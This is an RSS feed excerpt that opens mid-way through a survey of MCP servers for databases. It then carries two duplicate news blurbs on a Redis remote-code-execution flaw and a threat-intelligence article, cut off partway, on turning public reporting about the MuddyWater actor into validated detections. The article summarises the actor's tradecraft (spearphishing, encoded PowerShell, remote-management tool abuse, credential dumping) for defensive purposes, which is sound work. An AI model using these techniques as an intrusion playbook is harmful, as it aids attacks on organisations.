<p>The <a href="https://neo4j.com/developer/genai-ecosystem/model-context-protocol-mcp/">Official MCP Server for Neo4j</a> works with all kinds of Neo4j deployment (desktop, sandbox, self-managed, and the managed Neo4j Aura cloud service), and allows LLM-based clients to retrieve graph schema, execute read and write statements, execute graph algorithms, and more.</p>



<p>In addition, several other MCP servers for Neo4j are <a href="https://github.com/neo4j-contrib/mcp-neo4j">available from Neo4j Labs</a>. These have specialized uses, such as generating Cypher queries from natural language, maintaining an in-memory graph database, modeling and visualizing graph, and interacting with the Neo4j Aura API.</p>



<p>The first MCP server for Neo4j was developed in December 2024. If you’re an avid Neo4j user and want to experiment with interacting with your graph databases in a chat-infused way, these stand as an interesting platform of servers.</p>



<h2 class="wp-block-heading">MCP Toolbox for Databases</h2>



<p>Google’s <a href="https://github.com/googleapis/mcp-toolbox">MCP Toolbox for Databases</a> is a notable MCP server because it’s a popular catch-all for various database types. Unlike the other entries on this list, this server connects LLMs not to a single managed database, but unifies LLM access to multiple systems. The open source utility ships with <a href="https://mcp-toolbox.dev/documentation/configuration/prebuilt-configs/">pre-built configurations</a> for nearly 30 databases including PostgreSQL, MySQL, SQL Server, Oracle Database, MongoDB, Redis, Neo4j, and Snowflake, as well as the databases in Google Cloud.</p>



<p>Once you define data sources in a tools.yaml file, you can use MCP Toolbox to perform structured queries or semantic searches against databases directly from within an IDE or agentic client using plain English. MCP tools translate commands into actions like <code>list_tables</code> and <code>execute_sql</code>.</p>



<p>MCP Toolbox for Databases is mature, originally built as a generative AI utility and later re-worked for MCP-style workflows. It offers numerous download, configuration, and interaction methods.</p>



<p>If you’re using a variety of databases on Google Cloud and elsewhere and you want an “all-in-one” MCP server, MCP Toolbox for Databases is a great place to start.</p>



<h2 class="wp-block-heading"><a></a>MongoDB MCP Server</h2>



<p><a href="https://www.mongodb.com/">MongoDB</a> is the popular NoSQL document-oriented database. The creators of MongoDB have released an <a href="https://github.com/mongodb-js/mongodb-mcp-server">official MCP server</a> that works with the open-source database as well as the company’s cloud-hosted MongoDB Atlas database platform.</p>



<p>The MongoDB MCP Server provides a <a href="https://github.com/mongodb-js/mongodb-mcp-server#tool-list">number of tools</a> to interact with MongoDB. You can query the database, return information on collections, create or remove collections or indexes, gather statistics on database usage, and more. Other tools enable MongoDB Atlas operations, like creating users or clusters, returning cluster data, and other functions.</p>



<p>The server’s tools are read-only by default but can be switched to allow write capabilities. It can be used locally, but also supports Streamable HTTP transport for remote servers, although that comes with greater security concerns.</p>



<p>For those using MongoDB and wanting to hook their AI-enabled IDE or CLI up with more automated powers, the official MongoDB MCP Server is worth checking out.</p>



<h2 class="wp-block-heading">Pinecone MCP server</h2>



<p>Among <a href="https://www.infoworld.com/article/4060211/do-vector-native-databases-beat-add-ons-for-ai-applications.html">vector-native databases</a>, <a href="https://www.pinecone.io/">Pinecone</a> stands as a strong, widely used option with a well-designed <a href="https://docs.pinecone.io/reference/api/introduction">API</a> and comprehensive SDKs. The <a href="https://docs.pinecone.io/guides/operations/mcp-server">Pinecone MCP server</a> extends this experience, allowing users to query its documentation and execute functionality via AI agents and AI-enabled IDEs.</p>



<p>To date, the Pinecone MCP server consists of nine MCP tools. These cover read-only actions, like knowledge gathering via the Pinecone official documentation and querying vector records, index metadata, configurations, and statistics. It also allows for write operations like updating records and creating new indexes.</p>



<p>Released in mid-2025, the Pinecone MCP server is one of the more complete early implementations, with easy configuration and installation.</p>



<p>For those using Pinecone who want to test new LLM-assisted workflows for creating indexes with embeddings, performing reranking, or testing results using natural language commands, the Pinecone MCP server is worth trying out.</p>



<h2 class="wp-block-heading"><a></a>Redis MCP</h2>



<p>An ultra-fast in-memory database, Redis is commonly used for caching, real-time analytics, and other latency-sensitive use cases. And as you might have guessed, the company behind the Redis database provides an <a href="https://redis.io/docs/latest/integrate/redis-mcp/">official MCP server</a>. The server allows read, query, and write capabilities.</p>



<p>Developers can use Redis MCP from an LLM client to perform high-level actions to analyze, reference, or embed Redis data and interact with the Redis server within their prompts. The documentation suggests some example prompts for common use cases, such as “Cache this item,” “How many keys does my database have?,” and “What is user:1’s email?”</p>



<p>Unlike other MCP servers, which only allow a slice of platform capabilities, Redis MCP offers full Redis support. This enables working with Redis constructs such as hashes, lists, sets, sorted sets, streams, and more, according to the <a href="https://github.com/redis/mcp-redis">GitHub repository</a>.</p>



<p>One possible drawback is that Redis MCP has yet to support Streamable HTTP transport. Until this is developed, the server is constrained to local deployment. But for those seeking a local MCP server to work with Redis data, this is the best choice.</p>



<h2 class="wp-block-heading"><a></a>Snowflake MCP Server</h2>



<p>Snowflake is a cloud-hosted, AI-enabled data platform widely used in enterprise contexts for data warehousing, data analytics, and data engineering purposes. Compared to other data storage systems, Snowflake is unique in that it’s more fully managed and combines structured and non-structured data types.</p>



<p>The <a href="https://www.snowflake.com/en/developers/guides/getting-started-with-snowflake-mcp-server/">Snowflake MCP Server</a>, available on <a href="https://github.com/Snowflake-Labs/mcp">GitHub</a>, can be used to perform many of the standard Snowflake platform operations. This includes a “fuzzy” search of all records via Snowflake’s Cortex Search and structured data semantic lookups using Cortex Analyst.</p>



<p>Other abilities include object management operations like creating, updating, and deleting records. The server also can invoke other agentic-designed capabilities, like the ability to generate and execute SQL statements against back-end databases.</p>



<p>Snowflake MCP Server is well-thought-out and well-documented, with walkthroughs for various agent and deployment patterns. Those already building with Snowflake should find it complements the mechanics they already employ.</p>



<h2 class="wp-block-heading"><a></a>Supabase MCP Server</h2>



<p>A longtime open-source favorite, <a href="https://www.postgresql.org/">PostgreSQL</a> is one of the most popular and trusted object-relational SQL-based database systems. With an active <a href="https://leaddev.com/technical-direction/postgresql-database-quietly-ate-world">open source community</a>, Postgres has been maturing for decades. Given its open source nature, there isn’t a single “official” MCP server for the platform. Anthropic built an original reference implementation, but it’s <a href="https://github.com/modelcontextprotocol/servers-archived/tree/main/src/postgres">now archived</a>.</p>



<p>Instead, database platforms built on PostgreSQL provide <a href="https://dbhub.ai/blog/state-of-postgres-mcp-servers-2025">different flavors</a> of MCP servers, with a range of vendor neutrality and specificity. One notable option is the <a href="https://github.com/supabase-community/supabase-mcp#database">Supabase MCP Server</a>, provided by <a href="https://supabase.com/mcp">Supabase</a>, a cloud-based “back end as a service” and Postgres development platform.</p>



<p>Supabase MCP Server connects AI agents with Supabase projects, allowing engineers to issue natural language commands to manage tables, query data, get logs, fetch configuration information, and more. The Supabase MCP Server is pre-1.0 release and some features are still experimental.</p>



<p>If you’re an engineer using Supabase and looking for an MCP server to connect your AI assistant with your Postgres databases, this is a good tool to test out.</p>



<h2 class="wp-block-heading"><a></a><a></a>Other MCP servers for databases to consider</h2>



<p>So far, we’ve reviewed official, vendor-backed MCP servers from some of the most-adopted managed databases. However, numerous MCP servers exist across other database platforms and types.</p>



<p>One MCP server that aggregates LLM access across various database types is <a href="https://github.com/bytebase/dbhub">DBHub</a>, which works with MySQL, PostgreSQL, SQL Server, MariaDB, and SQLite. Developed by <a href="https://www.bytebase.com/">Bytebase</a>, DBHub is described as a zero-dependency, token-efficient MCP server.</p>



<p>For SQL, the options are nearly endless. Official servers exist for <a href="https://devblogs.microsoft.com/azure-sql/introducing-sql-mcp-server/">Microsoft Azure SQL</a> and <a href="https://github.com/motherduckdb/mcp-server-motherduck">DuckDB</a>. PulseMCP catalogs more than <a href="https://www.pulsemcp.com/servers?q=mysql">100 MCP servers</a> for <a href="https://dev.to/benborla/mcp-server-for-mysql-3jf1#main-content">MySQL</a>, although most are unofficial, solo-creator open source projects. Of these, one of the most starred is <a href="https://github.com/benborla/mcp-server-mysql">MCP Server for MySQL</a>, developed by full-stack developer <a href="https://benborla.dev/">Ben Borla</a> and optimized for Claude Code.</p>



<p>For Postgres, notable alternatives to Supabase include <a href="https://github.com/pgEdge/pgedge-postgres-mcp/">pgEdge Postgres MCP</a>, <a href="https://neon.com/docs/ai/neon-mcp-server">Neon MCP server</a>, and <a href="https://github.com/crystaldba/postgres-mcp">Postgres MCP Pro</a>. For vector databases, others beyond Pinecone have been quick to adopt MCP as well, including <a href="https://docs.weaviate.io/weaviate/mcp/docs-mcp-server">Weaviate</a> and <a href="https://milvus.io/docs/milvus_and_mcp.md">Milvus</a>.</p>



<h2 class="wp-block-heading"><a></a>Using MCP for databases: what to watch out for</h2>



<p>Before diving into MCP servers for enterprise databases, it’s important to understand the security risks. For instance, prompt injection remains an <a href="https://dbhub.ai/blog/state-of-postgres-mcp-servers-2025">unsolved problem</a>, so it’s recommended to limit permissions for SQL statements.</p>



<p>To mitigate this, <a href="https://github.com/supabase-community/supabase-mcp#security-risks">Supabase recommends</a> enabling AI client settings that require manual approval for each tool call before execution. Experts also recommend assigning only the minimum permissions required and avoiding exposure of sensitive data like API credentials. Due diligence around authentication and authorization is especially important when hosting remote servers.</p>



<p>Lastly, to avoid shadow IT, it’s becoming common practice to catalog the internal MCP servers you use, even for experimental projects. For this, experts recommend an <a href="https://www.infoworld.com/article/4145014/how-to-build-an-enterprise-grade-mcp-registry.html">MCP registry</a> that documents approved servers. An MCP registry improves both MCP server discovery and security awareness.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Redis Vulnerability Could Let Attackers Execute Code and Hijack Servers]]></title>
<description><![CDATA[A critical vulnerability in Redis, tracked as CVE-2026-23631 and dubbed “DarkReplica,” exposes authenticated deployments to remote code execution (RCE) through a complex use-after-free (UAF) condition in the replication subsystem. Discovered by security researcher Yoni Sherez during the ZeroDay. ...]]></description>
<link>https://tsecurity.de/de/3580817/it-security-nachrichten/critical-redis-vulnerability-could-let-attackers-execute-code-and-hijack-servers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580817/it-security-nachrichten/critical-redis-vulnerability-could-let-attackers-execute-code-and-hijack-servers/</guid>
<pubDate>Mon, 08 Jun 2026 10:35:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical vulnerability in Redis, tracked as CVE-2026-23631 and dubbed “DarkReplica,” exposes authenticated deployments to remote code execution (RCE) through a complex use-after-free (UAF) condition in the replication subsystem. Discovered by security researcher Yoni Sherez during the ZeroDay. In the…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/critical-redis-vulnerability-could-let-attackers-execute-code-and-hijack-servers/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/critical-redis-vulnerability-could-let-attackers-execute-code-and-hijack-servers/">Critical Redis Vulnerability Could Let Attackers Execute Code and Hijack Servers</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Redis Vulnerability Could Let Attackers Execute Code and Hijack Servers]]></title>
<description><![CDATA[A critical vulnerability in Redis, tracked as CVE-2026-23631 and dubbed “DarkReplica,” exposes authenticated deployments to remote code execution (RCE) through a complex use-after-free (UAF) condition in the replication subsystem. Discovered by security researcher Yoni Sherez during the ZeroDay. ...]]></description>
<link>https://tsecurity.de/de/3580797/it-security-nachrichten/critical-redis-vulnerability-could-let-attackers-execute-code-and-hijack-servers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580797/it-security-nachrichten/critical-redis-vulnerability-could-let-attackers-execute-code-and-hijack-servers/</guid>
<pubDate>Mon, 08 Jun 2026 10:29:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical vulnerability in Redis, tracked as CVE-2026-23631 and dubbed “DarkReplica,” exposes authenticated deployments to remote code execution (RCE) through a complex use-after-free (UAF) condition in the replication subsystem. Discovered by security researcher Yoni Sherez during the ZeroDay. In the Cloud 2025 competition, the flaw demonstrates how Redis’s internal Lua execution model and replication logic […]</p>
<p>The post <a href="https://gbhackers.com/critical-redis-vulnerability/">Critical Redis Vulnerability Could Let Attackers Execute Code and Hijack Servers</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Operation Desert Hydra — AI-Assisted CTI Pipeline: MuddyWater to Kibana]]></title>
<description><![CDATA[11 validated detections from public sources, OpenCTI graph, and a one-command labTable of ContentsMost threat actor writeups stop too early. They describe the group, list ATT&CK techniques, and paste some IoCs. Then the report sits in a folder while defenders wonder: what do I actually do with th...]]></description>
<link>https://tsecurity.de/de/3580441/hacking/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580441/hacking/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana/</guid>
<pubDate>Mon, 08 Jun 2026 06:38:19 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><em>11 validated detections from public sources, OpenCTI graph, and a one-command lab</em>Table of Contents</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_HvRb4_s15JQ6FkA9ng-8w.png"></figure><p>Most threat actor writeups stop too early. They describe the group, list ATT&amp;CK techniques, and paste some IoCs. Then the report sits in a folder while defenders wonder: <em>what do I actually do with this on Monday?</em></p><p>Operation Desert Hydra is an answer to that question.</p><p>This article documents a full CTI-to-detection pipeline focused on <strong>MuddyWater</strong> — an Iranian state-linked actor (MOIS) that has been targeting Israeli government, defense, and critical infrastructure organizations since at least 2019. By the end, you’ll have 11 detection records, 12 Kibana proof screenshots, and a working lab you can deploy with a single command.</p><p>Everything is on my GitHub: <a href="https://github.com/anpa1200/operation-desert-hydra">github.com/anpa1200/operation-desert-hydra</a></p><p><a href="https://github.com/anpa1200/operation-desert-hydra">GitHub - anpa1200/operation-desert-hydra: OpenCTI-based CTI-to-Detection Knowledge Graph for Iranian activity against Israeli organizations</a></p><ol><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#86dc"><strong>Why MuddyWater?</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#aadd"><strong>The Pipeline</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#c6f3"><strong>Phase 1: Source Gathering</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#205e"><strong>Phase 2: Procedure Dataset</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#fb48"><strong>Phase 3: OpenCTI Knowledge Graph</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#c2e1"><strong>Phase 4: Detection Atlas</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#8ce1"><strong>Phase 5: Validation Lab</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#0a42"><strong>Validation Results Summary</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#8cf4"><strong>Phase 6: Coverage Matrix</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#dfaa"><strong>What Defenders Should Do Right Now</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#b8cc"><strong>Reproduce It Yourself</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#dbb0"><strong>Production Scars</strong></a></li></ol><h3>Why MuddyWater?</h3><p>Three reasons:</p><ol><li><strong>Rich public reporting.</strong> CISA, Israel’s INCD, ClearSky, Deep Instinct, Mandiant, and Proofpoint have all published detailed technical analysis. This gives enough procedure-level specificity to engineer real detections.</li><li><strong>Consistent playbook.</strong> Across five years of reporting, the same pattern recurs: spearphishing → scripting engine → encoded PowerShell → RMM tool. The consistency makes it detectable.</li><li><strong>Relevant geography.</strong> The actor consistently targets Israeli organizations — a geography with high analytical value and underserved public detection coverage.</li></ol><h3>The Pipeline</h3><p>The project enforces a chain from source to Kibana screenshot:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*NDsnhzE7S-lzy0fSIOZrsw.png"></figure><pre>source → claim → procedure → ATT&amp;CK mapping → telemetry requirement<br>  → detection pseudologic → benign simulation → lab result → coverage score</pre><p>No step is skipped. Every claim has a source. Every detection has a validation case. Every PASS has a screenshot.</p><h3>Phase 1: Source Gathering</h3><p>The first step is source discovery, not detection writing.</p><h4>Traditional Source Gathering — and Why It’s Not Enough Alone</h4><p>The standard workflow for CTI source gathering looks like this: run keyword searches (Google, Google Dorks, site: operators for known vendor blogs), check your Threat Intelligence Platform for existing reports on the actor, subscribe to vendor RSS feeds, pull ISAC/ISAO advisories, and query your organization’s TIP for any existing indicator sets or finished intelligence reports tagged to the actor.</p><p>For a mature, well-documented actor like MuddyWater this gets you to maybe 15–20 well-known sources quickly — the CISA advisory, the MITRE ATT&amp;CK page, two or three vendor blog posts you already knew about. The problem is coverage holes: you’ll reliably find sources that are already in your network’s vocabulary and miss the ones that aren’t. A CERT-IL PDF published in Hebrew and linked only from a government portal, a Group-IB campaign teardown behind a partial paywall, or a 2020 ClearSky report that predates your current TIP subscription window — all of these can fall out of a manual search pass.</p><p>TIPs compound this in a specific way: they surface what has already been ingested and tagged. If a source was never promoted into your TIP (because it was published before the subscription started, or because no analyst had time to import it), it is invisible inside the platform. The TIP is authoritative for what it knows, not for the universe of available sources.</p><h4>AI research</h4><p>The parallel AI research pass was not a replacement for traditional gathering — it was a coverage supplement. After both approaches ran, the traditional pass and the AI outputs were merged into the same deduplication step. The AI outputs added approximately 40 sources beyond what a manual search surfaced; traditional search added discipline about sources the models hallucinated (fabricated URLs, mis-attributed PDFs). Neither was sufficient alone.</p><p>I ran parallel deep-research passes using Gemini and OpenAI, both given the same prompt. Each returned a candidate source register. Both outputs were compared, deduplicated (71 candidates → 8 promoted), and the surviving sources were manually acquired and reviewed before anything entered the dataset.</p><h4>The Actual Prompt</h4><p>This is the exact prompt used — both models received it verbatim:</p><pre>You are a senior CTI researcher and source-validation analyst. For Operation Desert Hydra,<br>gather the best public sources on MuddyWater / Seedworm / Mango Sandstorm / TA450 and<br>related Iranian activity against Israeli organizations. Goal: create a source register for<br>an OpenCTI-based CTI-to-detection knowledge graph:<br>Source → Actor → Campaign → Procedure → ATT&amp;CK Technique → Observable → Log Source<br>→ Detection → Validation → Coverage.<br>Search MITRE ATT&amp;CK, CISA/FBI/NSA, Israel National Cyber Directorate, Microsoft,<br>Google/Mandiant, ESET, Check Point, ClearSky, Unit 42, Proofpoint, SentinelOne,<br>Recorded Future, Symantec, Talos, Trend Micro, Kaspersky, Cloudflare/Hunt.io/DomainTools,<br>GitHub, and academic sources.<br>Include secondary comparison actors only as comparison: APT34, APT35/Charming Kitten/Mint<br>Sandstorm, CyberAv3ngers, Agrius. Do not merge actors unless a source explicitly supports<br>overlap.<br>For every source, return this YAML structure:<br>  id, title, publisher, url, direct_download_url, download_type, publication_date,<br>  access_date, actor_claims, source_type, reliability, relevance flags for<br>  actor_profile/procedures/malware/infrastructure/detections/validation_lab/opencti_modeling,<br>  key_entities, key_attck_techniques, source_summary, use_for_project, limitations.<br>Provide direct PDF/STIX/JSON/CSV/GitHub raw links where available; if unavailable write<br>direct_download_url: none_found. Do not invent URLs or dates.<br>Use evidence labels:<br>  Observed = directly shown in telemetry/sample/log/screenshot/source artifact<br>  Reported = stated by source<br>  Assessed = source judgment<br>  Inferred = analyst conclusion from multiple cited facts<br>  Gap = unknown or not proven<br>Do not upgrade source claims, do not treat ATT&amp;CK mapping as attribution evidence, do not<br>treat shared tooling as actor identity proof, and do not claim detection coverage without<br>validation.<br>Search exact terms including:<br>  MuddyWater Iran MOIS, MuddyWater Seedworm, MuddyWater Mango Sandstorm,<br>  MuddyWater TA450, MuddyWater POWERSTATS, PowGoop, MuddyViper, MuddyWater Israel,<br>  Israeli organizations, PowerShell, RMM, phishing, spearphishing, Exchange CVE-2020-0688,<br>  CVE-2017-0199, MITRE ATT&amp;CK, CISA FBI NSA advisory, Mango Sandstorm Microsoft,<br>  TA450 Proofpoint, Seedworm Symantec, ESET, ClearSky, Unit 42, Check Point, Mandiant,<br>  SentinelOne, Recorded Future, Talos, Trend Micro, Kaspersky;<br>  also: APT34 Israel, APT35 Israel, Mint Sandstorm Israel, CyberAv3ngers Israel,<br>  Agrius Israel, Iranian threat actors Israeli organizations.<br>Output only these sections:<br>  1) Executive Source Assessment<br>  2) High-Priority Source Register with 10-20 best sources in YAML<br>  3) Extended Source Register<br>  4) Direct Downloads Table<br>  5) Actor Alias / Overlap Notes<br>  6) Procedure Extraction Candidates grouped by tactic with source_ids, evidence_label,<br>     ATT&amp;CK candidate, required telemetry, detection opportunity, validation_possible<br>  7) OpenCTI Modeling Candidates<br>  8) Detection Engineering Opportunities marked candidate only<br>  9) Gaps And Manual Review Items<br>The final output must be usable to seed data/sources.yaml, data/procedures.yaml,<br>docs methodology, OpenCTI import plan, and detection atlas.</pre><h4>What the Prompt Is Designed to Do</h4><p>A few decisions worth explaining:</p><p><strong>Output schema in the prompt.</strong> Asking for a specific YAML field list (id, title, publisher, url, direct_download_url…) forces the model to either produce usable data or leave a visible blank — no vague summaries. direct_download_url: none_found is the required answer when a URL doesn't exist, which prevents the model from inventing one.</p><p><strong>Evidence labels baked in.</strong> The five labels (Observed / Reported / Assessed / Inferred / Gap) are defined in the prompt so the model applies them consistently and the output is ready to feed directly into data/procedures.yaml without reformatting.</p><p><strong>Explicit anti-hallucination rules.</strong> “Do not invent URLs or dates.” “Do not upgrade source claims.” “Do not treat ATT&amp;CK mapping as attribution evidence.” These are not just principles — they are instructions the model can fail visibly on, which makes QA faster.</p><p><strong>Parallel models, same prompt.</strong> Running Gemini and OpenAI on the same prompt and comparing outputs catches source fabrications: if one model lists a URL the other doesn’t, that URL gets verified before it enters the register. Two models that agree independently on a source add confidence; one model alone that lists something unusual is a flag.</p><h4>The Review Gate</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*p--8CFcThnLuDmZiNyOdQg.png"></figure><p>Every source that came out of the AI output went through this checklist before being promoted into data/sources.yaml:</p><ul><li>Is the URL real and accessible?</li><li>Is the publication date accurate?</li><li>Does the content actually describe MuddyWater procedures (not just mention the name)?</li><li>Is there at least one procedure-level claim (not just “actor uses PowerShell”)?</li><li>Is the actor identification explicit or inferred from shared tooling only?</li></ul><p>71 candidates → 8 government/vendor sources promoted. The rest were duplicates, secondary summaries, or sources that named the actor without procedure-level specificity.</p><h4>Research Artifacts (All in the Repo)</h4><p>Every file from the source gathering workflow is version-controlled and publicly accessible:</p><ul><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/Gemini-research.md"><strong>Gemini-research.md</strong></a> — Raw Gemini deep-research output: candidate source register in YAML, procedure extraction candidates, OpenCTI modeling candidates, detection opportunities, gaps.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/openAI-research.md"><strong>openAI-research.md</strong></a> — Raw OpenAI deep-research output: executive assessment, high-priority sources, extended source register, direct download list, actor alias notes.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/relevant-research-list.md"><strong>relevant-research-list.md</strong></a> — Deduplicated candidate list after comparing both model outputs: 71 sources, acquisition targets for Step 5.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/source-acquisition-report.md"><strong>source-acquisition-report.md</strong></a> — Results of the automated fetch run: HTTP status, content type, file size, and extraction status for all 71 sources.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/source-reliability-evidence-assessment.md"><strong>source-reliability-evidence-assessment.md</strong></a> — Analyst review notes: reliability ratings, evidence quality, promotion decisions, and limitations per source.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/tree/main/docs/source-gathering/raw-sources"><strong>raw-sources/</strong></a> — 71 numbered source folders, each containing metadata.json, headers.txt, the raw source file, extracted source.txt, and fallback reader output.</li></ul><h4><strong>Promoted sources (highest weight):</strong></h4><ul><li><strong>CISA AA22–055A (Feb 2022)</strong> — Full procedure survey: PowGoop, POWERSTATS, Small Sieve, Mori, Canopy, Marlin; WMI survey script; credential dumping tools.</li><li><strong>INCD 2023</strong> — Israeli campaign specifics: ScreenConnect/SimpleHelp RMM abuse, Egnyte/OneDrive lures, Log4j + Exchange exploitation.</li><li><strong>INCD 2024</strong> — BugSleep analysis: 43-minute scheduled task beacon, VPN exploitation, new RMM tools (Level, PDQConnect).</li></ul><p>Supporting vendor sources: ClearSky, Deep Instinct, Group-IB, Mandiant, Proofpoint, Sekoia.io, Symantec.</p><h4>Why These Three Have the Highest Weight</h4><p>The reliability assessment used a two-axis rubric: <strong>Source Reliability (A–F)</strong> separating publication discipline from content, and <strong>Information Credibility (1–6)</strong> rating how well each claim is grounded.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*672ETgk4DFDJDE0G2-sLgA.png"></figure><p><strong>CISA AA22–055A — Reliability A, Credibility 2</strong></p><p>This is a joint advisory signed by five national authorities: CISA, FBI, CNMF, NCSC-UK, and NSA. That multi-agency co-signature is not ceremonial — each agency must independently agree to the technical content before it publishes. The advisory names specific malware families (PowGoop, POWERSTATS, Small Sieve, Mori, Canopy, Marlin), includes an actual WMI PowerShell survey script attributed to MuddyWater, and lists credential-dumping tool names. Evidence label: Reported / Assessed. The PDF acquired locally at raw-sources/07-u-s-cyber-command-defense-media-aa22-055a-pdf-mirror/source.pdf is the authoritative copy distributed via Defense Media Activity. Credibility is 2, not 1, because the advisory states TTPs based on intelligence assessment rather than a single intercepted artifact — but the authority behind that assessment is as high as public-source CTI gets.</p><p><strong>INCD 2023 (MuddyWater / DarkBit PDF) — Reliability A, Credibility 2</strong></p><p>The Israel National Cyber Directorate is the government authority responsible for civilian cyber defense in Israel, the primary target country for this actor. This report covers a specific Israeli campaign including: tool names (ScreenConnect, SimpleHelp), file-sharing lure services (Egnyte, OneDrive), exploitation of Log4j and Exchange CVE-2020–0688, and deployment of ransomware (DarkBit) as a cover operation. Evidence label: Observed / Reported / Assessed. The "Observed" label means the INCD had direct visibility into the incident — not a secondary summary. This gives procedure-level specificity that generic vendor threat intel doesn't reach. Acquired at raw-sources/17-israel-national-cyber-directorate-muddywater-darkbit-pdf/source.pdf.</p><p><strong>INCD 2024 (BugSleep PDF) — Reliability A, Credibility 2</strong></p><p>Same publisher authority as INCD 2023, focused on MuddyWater’s 2024 evolution. Key content: BugSleep backdoor analysis, the specific 43-minute scheduled task beacon interval (which became proc_mw_0006 and det_mw_0006), VPN exploitation, and new RMM tools (Level, PDQConnect). The 43-minute interval is a concrete behavioral fingerprint — not a general TTP category — and it came from direct INCD analysis. Evidence label: Observed / Reported / Assessed. Acquired at raw-sources/18-israel-national-cyber-directorate-technological-advancement-and-evolution-of-muddywater-in/source.pdf.</p><p>The three sources share a common characteristic: they are not secondary aggregators or vendor marketing. They are government authorities with direct incident visibility reporting on specific Israeli campaigns.</p><h4>Steps After Deduplication: What Actually Happened to All 71 Sources</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XeokisYTU_DGw6UH7bLB3w.png"></figure><p>After the AI outputs were merged and deduplicated, 71 candidate sources remained. Here is what happened to them across Steps 5–9:</p><p><strong>Step 5 — Automated Acquisition</strong></p><p>tools/fetch_research_sources.py ran against all 71 URLs. For each source it created a numbered folder under docs/source-gathering/raw-sources/ with:</p><pre>raw-sources/<br>  01-mitre-att-ck-muddywater-g0069/<br>    metadata.json        # URL, fetch timestamp, HTTP status, content-type, size<br>    headers.txt          # Raw HTTP response headers<br>    source.html / source.pdf / source.txt   # Primary file<br>    source.txt           # Text extract (for PDFs and HTML)<br>    fallback-reader.txt  # Reader-mode fallback if primary was blocked or JS-rendered</pre><p>Not all fetches succeeded. Some sources returned 403 (vendor gating), some required JS rendering (only fallback text was captured), and two PDFs were corrupted. The acquisition report at docs/source-gathering/source-acquisition-report.md records the HTTP status, file size, and extraction status for all 71.</p><p><strong>Step 6 — Reliability and Credibility Rating</strong></p><p>Each acquired source was rated using the two-axis rubric. The full assessment table is in docs/source-gathering/source-reliability-evidence-assessment.md. Outcome breakdown:</p><ul><li>Reliability A (government / primary standard): 23 sources</li><li>Reliability B (usually reliable vendor / research publisher): 25 sources</li><li>Reliability C (secondary / news / marketing): 18 sources</li><li>Reliability F (failed acquisition or cannot judge): 5 sources</li></ul><p><strong>Step 7 — Promotion Decision</strong></p><p>Only sources with a combination of Reliability A or B, Credibility 2 or better, a usable acquisition, and at least one procedure-level claim were promoted into data/sources.yaml. The rest were assigned one of: Use as corroboration, Use as comparison only, Defer, or Exclude.</p><p>71 candidates → 8 primary sources promoted into the dataset. The 63 that were not promoted are retained in raw-sources/ for future work; they are not discarded.</p><p><strong>Step 8 — Claim Extraction</strong></p><p>For each promoted source, specific claims were extracted with source binding and evidence labels. A claim is not “MuddyWater uses PowerShell” — it is: “CISA AA22–055A (AA22–055A PDF, p.4) reports that MuddyWater actors deploy PowGoop, a DLL loader that decrypts and executes a PowerShell backdoor (Reported)." This source-bound format prevents claim drift downstream.</p><p><strong>Step 9 